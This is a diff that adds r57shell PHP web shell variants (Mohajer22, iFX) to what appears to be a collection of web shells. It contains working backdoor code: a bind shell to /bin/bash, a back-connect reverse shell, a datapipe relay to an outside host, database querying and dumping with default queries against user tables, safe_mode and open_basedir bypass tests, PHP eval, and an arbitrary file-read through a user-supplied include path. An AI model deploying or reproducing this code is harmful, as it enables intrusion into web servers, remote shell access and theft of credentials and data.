<b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' 
<b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>"; +} +if(!$safe_mode&&!$windows){ +echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? 
(getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f; + +$u1p=""; // File to Include... 
or use _GET _POST +$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp + + + +echo "<PRE>\n"; +if(empty($u1p)){ +if(empty($_GET['u1p'])){ +if(empty($_POST['u1p'])){ +die("<FONT COLOR=\"RED\"><CENTER><span lang=\"ar-sa\">&#1578;&#1593;&#1583;&#1610;&#1604; &#1608;&#1578;&#1591;&#1608;&#1610;&#1585; </span>\ Mohajer22</CENTER></FONT>"); +} else { +$u1p=$_POST['u1p']; +} +} else { +$u1p=$_GET['u1p']; +} +} + +$temp=tempnam($tymczas, "cx"); + +if(copy("compress.zlib://".$u1p, $temp)){ +$zrodlo = fopen($temp, "r"); +$tekst = fread($zrodlo, filesize($temp)); +fclose($zrodlo); +echo "".htmlspecialchars($tekst).""; +unlink($temp); + +} else { +die("<FONT COLOR=\"RED\"><CENTER>Sorry... File +<B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have +access.</CENTER></FONT>"); +} + + + + + +?> + diff --git a/php/PHPshell/م€گr57_Mohajer22م€‘/r57_Mohajer222.jpg b/php/PHPshell/م€گr57_Mohajer22م€‘/r57_Mohajer222.jpg new file mode 100644 index 0000000..b3cfdd9 Binary files /dev/null and b/php/PHPshell/م€گr57_Mohajer22م€‘/r57_Mohajer222.jpg differ diff --git a/php/PHPshell/م€گr57_iFXم€‘/r57.jpg b/php/PHPshell/م€گr57_iFXم€‘/r57.jpg new file mode 100644 index 0000000..c4452dc Binary files /dev/null and b/php/PHPshell/م€گr57_iFXم€‘/r57.jpg differ diff --git a/php/PHPshell/م€گr57_iFXم€‘/r572.jpg b/php/PHPshell/م€گr57_iFXم€‘/r572.jpg new file mode 100644 index 0000000..58ffbe9 Binary files /dev/null and b/php/PHPshell/م€گr57_iFXم€‘/r572.jpg differ diff --git a/php/PHPshell/م€گr57_iFXم€‘/r57_iFX.php b/php/PHPshell/م€گr57_iFXم€‘/r57_iFX.php new file mode 100644 index 0000000..8badfc3 --- /dev/null +++ b/php/PHPshell/م€گr57_iFXم€‘/r57_iFX.php 
@@ -0,0 +1,1917 @@ +<?phpr57shell.php - ?????? ?? ??? ??????????? ??? ????????? ???? ??????? ?? ??????? ????? ??????? +/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru +/* ??????: 1.23 +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* (c)oded by 1dt.w0lf +/* RST/GHC http://rst.void.ru , http://ghc.ru +/* ANY MODIFIED REPUBLISHING IS RESTRICTED +/******************************************************************************************************/ +//di modif ama pluto +//di modif lagi ama iFX + + +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = " ~Alissa~"; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_SERVER as $k=>$v) + { + $_SERVER[$k] = stripslashes($v); + } + } + +/* ~~~ ?????????????? ~~~ */ + +// $auth = 1; - ?????????????? ???????? +// $auth = 0; - ?????????????? ????????? +$auth = 0; + +// ????? ? ?????? ??? ??????? ? ??????? +// ?? ???????? ??????? ????? ??????????? ?? ???????!!! +$name=''; // ????? ???????????? +$pass=''; // ?????? ???????????? + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="Modified By iFX"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=http://lintah-club.ueuo.com>HELLW access denied tau'!!!, soryy neeh cuy!! :D</a> : Access Denied</b>"); + } +} +$head = '<!-- ?????????? ???? 
-->
+<html>
+<head>
+<title>:: The r57 shell with modified by iFX :: listening L\'Arc~en~Ciel - MilkyWay::</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+body,td,th {
+color: #00FF00;
+}
+tr {
+BORDER-RIGHT: #000000 1px solid;
+BORDER-TOP: #97C296 1px solid;
+BORDER-LEFT: #97C296 1px solid;
+BORDER-BOTTOM: #000E6A 1px solid;
+}
+td {
+BORDER-RIGHT: #000000 1px solid;
+BORDER-TOP: #97C296 1px solid;
+BORDER-LEFT: #97C296 1px solid;
+BORDER-BOTTOM: #000000 1px solid;
+}
+.table1 {
+BORDER-RIGHT: #333333 0px;
+BORDER-TOP: #97C296 0px;
+BORDER-LEFT: #97C296 0px;
+BORDER-BOTTOM: #333333 0px;
+BACKGROUND-COLOR: #000000;
+}
+.td1 {
+BORDER-RIGHT: #333333 0px;
+BORDER-TOP: #97C296 0px;
+BORDER-LEFT: #97C296 0px;
+BORDER-BOTTOM: #333333 0px;
+font: 7pt Verdana;
+}
+.tr1 {
+
+BORDER-RIGHT: #333333 0px;
+BORDER-TOP: #333333 0px;
+BORDER-LEFT: #333333 0px;
+BORDER-BOTTOM: #333333 0px;
+}
+table {
+BORDER-RIGHT: #97C296 1px outset;
+BORDER-TOP: #97C296 1px outset;
+BORDER-LEFT: #97C296 1px outset;
+BORDER-BOTTOM: #97C296 1px outset;
+BACKGROUND-COLOR: #004F0A;
+}
+input {
+BORDER-RIGHT: #ffffff 1px solid;
+BORDER-TOP: #00CA0B 1px solid;
+BORDER-LEFT: #00CA0B 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #004F0A;
+font: 8pt Verdana;
+color : #FFFFFF;
+}
+select {
+BORDER-RIGHT: #ffffff 1px solid;
+BORDER-TOP: #00CA0B 1px solid;
+BORDER-LEFT: #00CA0B 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #004F0A;
+font: 8pt Verdana;
+color:#80DBEE
+}
+submit {
+BORDER-RIGHT: buttonhighlight 2px outset;
+BORDER-TOP: buttonhighlight 2px outset;
+BORDER-LEFT: buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #004F0A;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT: #ffffff 1px solid;
+BORDER-TOP: #00CA0B 1px solid;
+BORDER-LEFT: #00CA0B 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #004F0A;
+font: Fixedsys bold;
+color:#E49F1F;
+}
+BODY {
+margin-top: 
1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +background-color: #000000; +} + +A:link {COLOR: #97C296; TEXT-DECORATION: none} +A:visited { COLOR: #2BE421; TEXT-DECORATION: none} +A:active {COLOR: #000099; TEXT-DECORATION: none} +A:hover {color: #2FADD7; TEXT-DECORATION: underline} +</STYLE>'; +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if ($_POST['cmd']=="db_query") + { + echo $head; + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." 
: ".htmlspecialchars($query)."</b></font><br>"; + $res = @mysql_query($query,$db); + $error = @mysql_error($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@mysql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mysql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @mysql_free_result($res); + } + } + @mysql_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." 
: ".htmlspecialchars($query)."</b></font><br>"; + $res = @mssql_query($query,$db); + if (@mssql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mssql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */ + @mssql_free_result($res); + } + } + @mssql_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." 
: ".htmlspecialchars($query)."</b></font><br>"; + $res = @pg_query($db,$query); + $error = @pg_errormessage($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@pg_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @pg_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @pg_free_result($res); + } + } + @pg_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>"; + break; + case 'Oracle': + $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']); + if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; } + else + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5) { + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." 
: ".htmlspecialchars($query)."</b></font><br>"; + $stat = @ociparse($db, $query); + @ociexecute($stat); + if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; } + else + { + $rowcount = @ocirowcount($stat); + if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";} + else { + echo "<table width=100%><tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; } + echo "</tr>"; + while(ocifetch($stat)) + { + echo "<tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; } + echo "</tr>"; + } + echo "</table><br>"; + } + @ocifreestatement($stat); + } + } + } + @ocilogoff($db); + } + break; + } + echo "<form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + 
@unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= 
'<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +/* +????? ????? +$language='ru' - ??????? +$language='eng' - ?????????? +*/ +$language='eng'; +$lang=array( +'ru_text1' =>'??????????? ???????', +'ru_text2' =>'?????????? ?????? ?? ???????', +'ru_text3' =>'????????? ???????', +'ru_text4' =>'??????? ??????????', +'ru_text5' =>'???????? ?????? ?? ??????', +'ru_text6' =>'????????? ????', +'ru_text7' =>'??????', +'ru_text8' =>'???????? ?????', +'ru_butt1' =>'?????????', +'ru_butt2' =>'?????????', +'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', +'ru_text10'=>'??????? ????', +'ru_text11'=>'?????? ??? 
???????',
+'ru_butt3' =>'???????',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-?????',
+'ru_text14'=>'????',
+'ru_butt4' =>'?????????',
+'ru_text15'=>'???????? ?????? ? ?????????? ???????',
+'ru_text16'=>'????????????',
+'ru_text17'=>'????????? ????',
+'ru_text18'=>'????????? ????',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'????????????',
+'ru_text21'=>'????? ???',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'????????? ????',
+'ru_text24'=>'????????? ????',
+'ru_text25'=>'????????? ????',
+'ru_text26'=>'????????????',
+'ru_butt5' =>'?????????',
+'ru_text28'=>'?????? ? safe_mode',
+'ru_text29'=>'?????? ????????',
+'ru_butt6' =>'???????',
+'ru_text30'=>'???????? ?????',
+'ru_butt7' =>'???????',
+'ru_text31'=>'???? ?? ??????',
+'ru_text32'=>'?????????? PHP ????',
+'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
+'ru_butt8' =>'?????????',
+'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
+'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
+'ru_text36'=>'????',
+'ru_text37'=>'?????',
+'ru_text38'=>'??????',
+'ru_text39'=>'???????',
+'ru_text40'=>'???? ??????? ???? ??????',
+'ru_butt9' =>'????',
+'ru_text41'=>'????????? ? ?????',
+'ru_text42'=>'?????????????? ?????',
+'ru_text43'=>'????????????? ????',
+'ru_butt10'=>'?????????',
+'ru_butt11'=>'?????????????',
+'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
+'ru_text45'=>'???? ????????',
+'ru_text46'=>'???????? phpinfo()',
+'ru_text47'=>'???????? ???????? php.ini',
+'ru_text48'=>'???????? ????????? ??????',
+'ru_text49'=>'???????? ??????? ? ???????',
+'ru_text50'=>'?????????? ? ??????????',
+'ru_text51'=>'?????????? ? ??????',
+'ru_text52'=>'????? ??? ??????',
+'ru_text53'=>'?????? ? ?????',
+'ru_text54'=>'????? ?????? ? ??????',
+'ru_butt12'=>'?????',
+'ru_text55'=>'?????? ? ??????',
+'ru_text56'=>'?????? ?? ???????',
+'ru_text57'=>'???????/??????? 
????/??????????', +'ru_text58'=>'???', +'ru_text59'=>'????', +'ru_text60'=>'??????????', +'ru_butt13'=>'???????/???????', +'ru_text61'=>'???? ??????', +'ru_text62'=>'?????????? ???????', +'ru_text63'=>'???? ??????', +'ru_text64'=>'?????????? ???????', +'ru_text65'=>'???????', +'ru_text66'=>'???????', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'???????', +'ru_text69'=>'????????1', +'ru_text70'=>'????????2', +'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)", +'ru_text72'=>'????? ??? ??????', +'ru_text73'=>'?????? ? ?????', +'ru_text74'=>'?????? ? ??????', +'ru_text75'=>'* ????? ???????????? ?????????? ?????????', +'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', +'ru_text77'=>'???????? ????????? ???? ??????', +'ru_text78'=>'?????????? ???????', +'ru_text79'=>'?????????? ???????', +'ru_text80'=>'???', +'ru_text81'=>'????', +'ru_text82'=>'???? ??????', +'ru_text83'=>'?????????? SQL ???????', +'ru_text84'=>'SQL ??????', +'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? 
MSSQL ???????', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Sikat..!!', +'eng_text2' =>'Running..di server', +'eng_text3' =>'Jalankan perintah', +'eng_text4' =>'Direktori Skrg', +'eng_text5' =>'Upload files ke server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Sikat', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password untuk', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Table', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! 
